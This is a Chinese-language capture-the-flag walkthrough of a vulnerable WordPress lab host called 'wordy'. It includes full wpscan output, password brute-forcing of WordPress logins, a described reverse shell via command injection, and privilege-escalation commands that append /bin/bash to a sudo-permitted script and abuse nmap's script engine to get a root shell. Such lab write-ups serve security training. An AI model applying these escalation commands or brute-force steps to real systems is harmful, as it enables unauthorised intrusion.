一,靶场信息
有2点需要注意:一,需要编辑hosts文件才能访问网站;二,给了一条线索,是一个密码文件。
二,信息收集
1,确定目标IP
2,端口扫描
3,漏洞扫描
4,修改hosts文件
5,敏感信息收集
6,wpscan报告
──(root💀kali)-[~]
└─# wpscan --url "http://wordy/"
WARNING: Nokogiri was built against libxml version 2.9.10, but has dynamically loaded 2.9.14
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://wordy/ [192.168.86.160]
[+] Started: Mon Jun 26 05:13:46 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.2
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===============================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Jun 26 05:13:49 2023
[+] Requests Done: 180
[+] Cached Requests: 5
[+] Data Sent: 41.508 KB
[+] Data Received: 12.78 MB
[+] Memory used: 273.164 MB
[+] Elapsed time: 00:00:03
三,渗透过程
思路:nmap漏洞扫描中发现了几个用户名,线索刚好有一个密码本,可以试试爆破。
1,导出密码本
2,使用wpscan进行爆破
3,在系统里找到了危险点(有可能存在任意命令执行漏洞)
4,进行反弹shell
四,进行提权
在尝试了以前所使用的提权都没有效果,去home目录里看一下。
jens目录下面有个文件backups.sh,mark目录下也有个文件things-to-do.txt,里面有用户graham用户的密码,切换到graham用户。
思路:发现了jens用户的无密码命令执行文件backups.sh,可以以jens的身份横向命令执行。
echo "/bin/bash" >>/home/jens/backups.sh
sudo -u jens ./backups.sh
发现了具有root权限的nmap文件,接下来使用nmap进行提权就OK了。
提权命令:
echo "os.execute('/bin/bash')">shell
nmap --script=shell
五,总结
本靶场主要考查了弱口令爆破,wpscan的应用,任意命令执行漏洞和sudo提权中的nmap提权。